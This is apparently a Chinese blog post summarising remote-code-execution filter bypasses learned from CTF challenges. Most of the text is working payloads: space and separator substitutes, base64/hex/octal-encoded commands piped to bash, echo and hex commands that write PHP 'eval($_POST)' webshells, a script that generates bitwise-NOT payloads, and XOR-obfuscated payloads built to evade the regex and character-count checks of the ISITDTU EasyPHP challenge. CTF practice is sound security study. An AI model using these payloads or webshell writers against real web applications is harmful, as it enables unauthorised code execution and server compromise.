做了很多的题目,静下心来学习大佬做点小总结
< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等
?code=(~%8F%97%8F%96%91%99%90)();
在做NSS平台上的一道rce题目就是用到类似的思路,这里是把system函数取反
要想做经典取反例题就是下面这道极客的题
[极客大挑战 2019]RCE ME,感兴趣可以去buu上做
wp链接[极客大挑战 2019]RCE ME(取反、异或绕过正则表达式、bypass disable_function)
搜到的大佬脚本
<?php
//在命令行中运行
/*author yu22x*/
fwrite(STDOUT,'[+]your function: ');
$system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
fwrite(STDOUT,'[+]your command: ');
$command=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
echo '[*] (~'.urlencode(~$system).')(~'.urlencode(~$command).');';
linux中:%0a(回车) 、%0d(换行) 、; 、& 、| 、&&、||
windows中:%0a、&、|、%1a(一个神奇的角色,作为.bat文件中的命令分隔符)
1.a=fl;b=ag;cat $a$b
2.用点来链接
(sy.(st).em)
3.使用内敛执行代替system
echo `ls`;
echo $(ls);
?><?=`ls`;
?><?=$(ls);
<?=`ls /`;?>
# 以上语句皆等效于<?php echo `ls /`; ?>
1.base64编码绕过
echo "Y2F0IC9mbGFn"|base64 -d|bash ==>cat /flag
这边我是有点存疑的,我自己实验后是会报错的
echo 'Y2F0wqAK' | base64 -d 文件的名字
上面echo输出到d的地方会被命令行解析为cat,整个句子就可以变为cat 某个文件的文件名
从而达到绕过来查看内容的目的
但我却在kali里出现了如下错误提示
同样在ubuntu上也是不行
希望有懂得大佬能评论解惑一下==
2.Hex
echo "636174202f666c6167" | xxd -r -p|bash ==>cat /flag
3.oct
$(printf "\154\163") ==>ls
$(printf "\x63\x61\x74\x20\x2f\x66\x6c\x61\x67") ==>cat /flag
{printf,"\x63\x61\x74\x20\x2f\x66\x6c\x61\x67"}|\$0 ==>cat /flag
#可以通过这样来写webshell,内容为
${printf,"\74\77\160\150\160\40\100\145\166\141\154\50\44\137\120\117\123\124\133\47\143\47\135\51\73\77\76"} >> 1.php
例题可见[GXYCTF 2019]Ping Ping Ping
ca‘‘t flag 或ca""t flag
cat、tac、more、less、head、tail、nl、sed、sort、uniq
举例
cat `ls` (该目录下存在index.php和flag.php,也就是此命令会扫描当前目录然后读取所有文件)
等效于
cat flag.php;cat index.php
linux
echo “<?php eval(@\$_POST['pass']);?>” > shell.php;
或者十六进制写法
echo 3c3f7068706576616c2840245f504f53545b2270617373225d293b3f3e|xxd -r -ps > webshell.php
windows
“echo ^<?php eval($_POST[pass]); ?^> > shell.php”
成功后就有一句话木马可以执行使用,相当于绕过过滤
上题目讲解:[ISITDTU 2019]EasyPHP
源码:
<?php
highlight_file(__FILE__);
$_ = @$_GET['_'];
if ( preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $_) )
die('rosé will not do it');
if ( strlen(count_chars(strtolower($_), 0x3)) > 0xd )
die('you are so close, omg');
eval($_);
?>
参考wp
count_chars() 函数返回字符串中所用字符的信息(例如,ASCII 字符在字符串中出现的次数,或者某个字符是否已经在字符串中使用过)。
可以看到~和^没有被过滤,所以应该使用异或和取反绕过。
试一下用取反查看phpinfo
(~%8F%97%8F%96%91%99%90)();
成功了
禁止很多函数
但我们可以用print_r(scandir(.))函数获得目录。
((%8F%8D%96%91%8B%A0%8D)^(%FF%FF%FF%FF%FF%FF%FF))(((%8C%9C%9E%91%9B%96%8D)^(%FF%FF%FF%FF%FF%FF%FF))((%D1)^(%FF)));
(%8F%8D%96%91%8B%A0%8D)^(%FF%FF%FF%FF%FF%FF%FF)即print_r
(%8C%9C%9E%91%9B%96%8D)^(%FF%FF%FF%FF%FF%FF%FF)即scandir 后面就是(.)
但要绕过第二个if
本地测试后我们的payload经过count_chars之后长度为16,我们要想办法减少三个
这里有一个思路
先上脚本
str = 'acdips'
target = 'ntr'
for m in target:
for a in str:
for b in str:
for c in str:
if ord(a)^ord(b)^ord(c) == ord(m):
print("{} = {}^{}^{}".format(m,a,b,c))
得到
n = c^d^i
t = c^d^s
r = a^c^p
拿n为例。因为n = cdi 所以~n = ~cdi成立,即n ^0xff= cdi^0xff成立
再来看看我们的payload,取前部分print_r说明
(%8F%8D%96%91%8B%A0%8D)^(%FF%FF%FF%FF%FF%FF%FF)将对应的ntr替换变成:
(%8F%9E%96%9C%9C%A0%9E)(%FF%9C%FF%9B%9B%FF%9C)(%FF%8F%FF%96%8C%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF)
在四个括号中,将要替换的字符用响应的三个代替字符代替,最后一个括号全为0xff相当于取反,而其他不变的字符不变,但异或了3个0xff相当于取反三次,等同于去反一次,所以仍不变,本地测试。
再进行替换
再用这个思路将payload中所有的ntr替换。
最后
((%8F%9E%96%9C%9C%A0%9E)^(%FF%9C%FF%9B%9B%FF%9C)^(%FF%8F%FF%96%8C%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))(((%8C%9C%9E%9C%9B%96%9E)^(%FF%FF%FF%9B%FF%FF%9C)^(%FF%FF%FF%96%FF%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))((%D1)^(%FF)));
print_r(scandir(.))
((%8F%9E%96%9C%9C%A0%9E)^(%FF%9C%FF%9B%9B%FF%9C)^(%FF%8F%FF%96%8C%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))(((%8C%9C%9E%9C%9B%96%9E)^(%FF%FF%FF%9B%FF%FF%9C)^(%FF%FF%FF%96%FF%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))((%D1)^(%FF)));
readfile(end(scandir(.)))
((%8D%9A%9E%9B%99%96%93%9A)^(%FF%FF%FF%FF%FF%FF%FF%FF))(((%9A%9E%9B)^(%FF%99%FF)^(%FF%96%FF)^(%FF%FF%FF))(((%8D%9E%9E%9E%9B%96%8D)^(%9A%9B%FF%99%FF%FF%FF)^(%9B%99%FF%96%FF%FF%FF)^(%FF%FF%FF%FF%FF%FF%FF))(%D1^%FF)));
有时候碰到一些命令函数,比如exec执行是没有回显的,就可以采用使用重定向输出到文件,再查看文件内容的办法
看一道例题
<?php
highlight_file(__FILE__);
if(isset($_GET['url']))
{
$url=$_GET['url'];
if(preg_match('/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$/i',$url))
{
echo "Sorry,you can't use this.";
}
else
{
echo "Can you see anything?";
exec($url);
}
} Can you see anything?
绕过姿势很简单,但是关键就在绕过后看不到回显内容
我们采用输出到文件的方法
url=l\s / | tee 1.txt
访问1.txt
成功,读取flag就好
url=tac /flllll\aaaaaaggggggg | tee 2.txt
羽师傅的文章
无字母数字绕过正则表达式总结(含上传临时文件、异或、或、取反、自增脚本)
RCE漏洞之绕过
总结rce(远程代码执行各种sao姿势)绕过bypass
RCE的Bypass骚姿势
PHP空格绕过(给自己看)
RCE注入过滤